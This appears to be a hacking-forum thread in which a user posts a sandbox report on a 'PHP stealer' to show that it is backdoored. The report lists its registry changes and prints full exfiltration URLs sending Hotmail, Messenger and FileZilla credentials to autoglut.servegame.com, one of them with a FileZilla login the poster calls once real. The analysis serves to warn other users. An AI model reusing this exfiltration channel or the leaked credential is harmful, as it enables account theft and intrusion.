
Locked Anti-Av PHP Stealer [2013 FUD] Stabil!


Slwestr


Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

 

As ЭдБытсс rightly says, it is backdoored.

 

BSA report:

 

[ Changes to filesystem ]

* Modifies file C:\Users\XXXX\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat

* Deletes file C:\Users\XXXX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.tmp

 

[ Changes to registry ]

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{0358B920-0AC7-461F-98F4-58E32CD89148}

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{057EEE47-2572-4AA1-88D7-60CE2149E33C}

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}

* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\SQMClient\Windows\DisabledProcesses

* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\SQMClient\Windows\DisabledSessions

* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\PeerDist\Service

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1e9ea5f7-5fc9-11e1-b06c-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1e9ea634-5fc9-11e1-b06c-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{45cc1d6c-eca1-11e1-9547-806e6f6e6963}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{7c627537-5fd7-11e1-9cc6-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b0b98a20-5f41-11e1-b30b-806e6f6e6963}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b124dd89-6004-11e1-aaa9-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b3a9e94c-a932-11e2-b7b2-806e6f6e6963}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{ed3bffff-790f-11e1-a31b-000c292fcffb}

old value empty

* Empties value "CachePrefix" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content

old value "CachePrefix=0000"

* Modifies value "SavedLegacySettings..." in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

old value "SavedLegacySettings..."

* Modifies value "DefaultConnectionSettings..." in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

old value "DefaultConnectionSettings..."

* Creates value "TEST.exe=Slwestr" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\G:\DESCARGAS\EXCLUIDO AVS\AAStealer\Stealer

binary data=53006C00770065007300740072000000

 

[ Network services ]

* Looks for an Internet connection.

* Queries DNS "autoglut.servegame.com".

* G:\DESCARGAS\EXCLUIDO AVS\AAStealer\Stealer\TEST.exe Connects to "50.28.8.18" on port 80 (TCP - HTTP).

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&username=Password&password=Password%20Strength&app=User%20Name&pcname=EDITADO-POR-MI&sitename=eb%20Browser".

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&[email protected]&password=a%20hackear%20a%20tu%20puta%20madre&app=Messenger&pcname=XXXX&sitename=www.hotmail.com".

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&[email protected]&password=a%20pelarla%20lammersillo%20jejeje&app=Messenger&pcname=XXXX&sitename=www.hotmail.com".

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&username=u947071809&password=3nGZRuaEqL&app=Filezilla&pcname=XXXX&sitename=31.170.166.199".

* Opens next URLs:

[hidden URL] Strength&app=User Name&pcname=XXXX&sitename=eb Browser --->> backdoor

[hidden URL] hackear a tu puta madre&app=Messenger&pcname=XXXX&sitename=www.hotmail.com ---> correct, this is what I would receive

[hidden URL] hackear a tu puta madre&app=Messenger&pcname=XXXX&sitename=www.hotmail.com --->> backdoor

[hidden URL] pelarla lammersillo jejeje&app=Messenger&pcname=XXXX&sitename=www.hotmail.com ---> correct, this is what I would receive

[hidden URL] pelarla lammersillo jejeje&app=Messenger&pcname=XXXX&sitename=www.hotmail.com --->> backdoor

[hidden URL] ---> correct, this is what I would receive

[hidden URL] --->> backdoor

 

[ Process/window/string information ]

* Deletes activity traces.

* Sleeps 960 seconds.

PS: I use two accounts with fake passwords for testing, plus one FileZilla account that was real, although I no longer use it; that and my PC name are the only things I edited in the report.

As you can see, besides localhost it also connects to the author.

PS2: the forum is running veeeery slowly for me; posting this was a nightmare.

Regards

Edited by TIFONS